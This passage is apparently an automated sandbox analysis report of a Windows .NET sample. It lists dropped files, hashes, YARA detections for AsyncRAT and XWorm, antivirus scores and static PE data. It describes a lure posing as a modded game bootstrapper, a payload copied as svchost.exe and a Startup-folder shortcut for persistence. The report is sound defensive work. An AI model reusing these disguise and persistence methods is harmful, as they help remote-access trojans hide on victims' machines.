                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ef2jitt0.3tm.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyxe35mw.1bl.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzfnu2hb.luf.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbcvscpx.h2x.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwnc5ikm.xa4.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxnws5b1.m1g.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyrxdzwy.ccb.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvq0jtyn.lin.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1imjjjg.5yj.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sDKRz09zM7.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):730112
                                                                                                                                                                                                                                            Entropy (8bit):5.787095893687158
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:yDZdCcCJIN7OJFnLQiVnnNWzqG2k9BQZyxVfNxE3GpspjYuVTKXvLLFVH11US9IL:iJ7mFMixnNWSOI56LFp1iTq2BpjWK
                                                                                                                                                                                                                                            MD5:EDBE7F367BE35F4D0702F81FC432C9EC
                                                                                                                                                                                                                                            SHA1:AC4AD252CC5834F603479D7DD0D7E4E929E7C5B3
                                                                                                                                                                                                                                            SHA-256:6F072A142FFA38B89792FB8D8C12520F5EA37EFFFC71EFA3478BBAE7C2CAF366
                                                                                                                                                                                                                                            SHA-512:2D369FD1EE36692D870C865FE225FAECD282014F3687DFD8E52ECD579ABA038C7DDE7B3C973AD17526CF263770AB0579AC4AEBBE89E743BEC3180F6E132CFEBA
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."...................... ....@...... .......................`............`...@......@............... ...............................@..u............................................................................................ ..H............text........ ...................... ..`.rsrc...u....@......................@..@........................................H............U..........................................................................................................".'.<.>.&.......................................................................................................................d........'......@B..............................;...Z...x.......................0...N...m................................................................................. .'./.".[.].(.)...........\...( ) ....................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\not rat.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Dec 1 18:09:12 2024, mtime=Sun Dec 1 18:09:12 2024, atime=Sun Dec 1 18:09:12 2024, length=42496, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):765
                                                                                                                                                                                                                                            Entropy (8bit):5.071282059594917
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:8nuuG24G4kChRY//9alL4xjAgHkR8d8zmV:8nuuoGBhsMA7RgIm
                                                                                                                                                                                                                                            MD5:ABB3DDF6685E9EBCF08BB4FC767C583F
                                                                                                                                                                                                                                            SHA1:9DBC85920CD4BD3BFFAFDE98ECB9636C35490DDF
                                                                                                                                                                                                                                            SHA-256:F476C5F639724481B4FD573A52E76E599E28E51E84924E32414636BE3CF87551
                                                                                                                                                                                                                                            SHA-512:1BB426E1310F4778FD93B159657D2230FD19165416B8C886ED69AA7642F22FAF0C0B5D4C81C7912FD0D118E8B5D3F5400529FDFE13AB6A0343110402498E0CD9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:L..................F.... ....(.$D...(.$D...(.$D..........................v.:..DG..Yr?.D..U..k0.&...&.......y.Yd......P$D..=t'.$D......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y............................d...A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW)B.Y.............................-.R.o.a.m.i.n.g.....b.2......Y'. .svchost.exe.H......Y'..Y'.....D(....................Q@..s.v.c.h.o.s.t...e.x.e.......Z...............-.......Y....................C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......468325...........hT..CrF.f4... .........,...E...hT..CrF.f4... .........,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\not rat.exe

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sDKRz09zM7.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42496
                                                                                                                                                                                                                                            Entropy (8bit):5.546283806626274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:BmrJDweBDuOkScrbsN/x6WECAr43M4fJF5Pa9p+/fza6iOwhl3/mb2:B0DwewicrbsN/YDRrcRF49Im6iOwr+y
                                                                                                                                                                                                                                            MD5:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            SHA1:4A367BFA1DEB66D390FE249AA2BC979BC957619F
                                                                                                                                                                                                                                            SHA-256:51184955D5AB79AB4D7EFA46F1618E16B8E1FF90030EF7B6EF81A0E89CD6138A
                                                                                                                                                                                                                                            SHA-512:0C5B76B3B17D4881F97908D99ABEE07954A7BC97C7E85AB16AB2218535BFC27FAE45A2B20270B384FA29033341D5A6B38F0F1955ADA579DDE46EE2B649D98016
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.Jg................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......D^..d[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\svchost.exe

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\not rat.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42496
                                                                                                                                                                                                                                            Entropy (8bit):5.546283806626274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:BmrJDweBDuOkScrbsN/x6WECAr43M4fJF5Pa9p+/fza6iOwhl3/mb2:B0DwewicrbsN/YDRrcRF49Im6iOwr+y
                                                                                                                                                                                                                                            MD5:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            SHA1:4A367BFA1DEB66D390FE249AA2BC979BC957619F
                                                                                                                                                                                                                                            SHA-256:51184955D5AB79AB4D7EFA46F1618E16B8E1FF90030EF7B6EF81A0E89CD6138A
                                                                                                                                                                                                                                            SHA-512:0C5B76B3B17D4881F97908D99ABEE07954A7BC97C7E85AB16AB2218535BFC27FAE45A2B20270B384FA29033341D5A6B38F0F1955ADA579DDE46EE2B649D98016
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.Jg................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......D^..d[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                                                                                                                            C:\Users\user\Desktop\DISCORD

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):103
                                                                                                                                                                                                                                            Entropy (8bit):4.081427527984575
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
                                                                                                                                                                                                                                            MD5:B016DAFCA051F817C6BA098C096CB450
                                                                                                                                                                                                                                            SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
                                                                                                                                                                                                                                            SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
                                                                                                                                                                                                                                            SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

                                                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                            Entropy (8bit):4.372499919926089
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:/FVfpi6ceLP/9skLmb0OyWWSPtaJG8nAge35OlMMhA2AX4WABlguNFiL:tV1oyWWI/glMM6kF7Xq
                                                                                                                                                                                                                                            MD5:457886ED5000E6D4A64CD8F2FFE46379
                                                                                                                                                                                                                                            SHA1:CAA0061F604A65D7E0B209B6A912A4BDD8400E10
                                                                                                                                                                                                                                            SHA-256:E4E36D6CA3EB3B631B75188E9986E8658DF74EBA6136B3E323AA001B860AB3BC
                                                                                                                                                                                                                                            SHA-512:A6E6B403C136136F0C6993F9223A9A617873124EFA1CF685DC1D77FE030F0BEC00FB34B0639AA920DBA1D210E05931C71B72A105347405288D1B6384FFF433BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Z.]$D.............................................................................................................................................................................................................................................................................................................................................. D.i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            \Device\ConDrv

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):571
                                                                                                                                                                                                                                            Entropy (8bit):4.9398118662542965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                                                                                                                                                                                                                            MD5:5294778E41EE83E1F1E78B56466AD690
                                                                                                                                                                                                                                            SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                                                                                                                                                                                                                            SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                                                                                                                                                                                                                            SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                                                                                                            Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.996204060174564
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                            File name:sDKRz09zM7.exe
                                                                                                                                                                                                                                            File size:782'848 bytes
                                                                                                                                                                                                                                            MD5:6c06275582db133a429e4149c0f1ac21
                                                                                                                                                                                                                                            SHA1:44c91c923711ed57cafbdd235fb4d1eac8a02a57
                                                                                                                                                                                                                                            SHA256:51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2
                                                                                                                                                                                                                                            SHA512:73bcca36ab0f6346dfb4020a0cc0fba2c907831f474cef3aeee30c57683bdaecff869d06c35d09b104d0db6df5dd513e19d724135d27fac7ecc524cd3ece7ac4
                                                                                                                                                                                                                                            SSDEEP:12288:YQRNZLQX+3D5f1rH38kqColunF5mCwvUtGyemkLp1FkZ7ptNUyg5C:vLzD5fx38kuluFQC8UYyHC6BrKyg
                                                                                                                                                                                                                                            TLSH:44F4232F63936589F3EC78B12C14CA3F5B57035C567F5E1E4A9668C6BAC0A728722D30
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Jg................................. ... ....@.. .......................`............@................................

                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Entrypoint:0x4c06fe
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
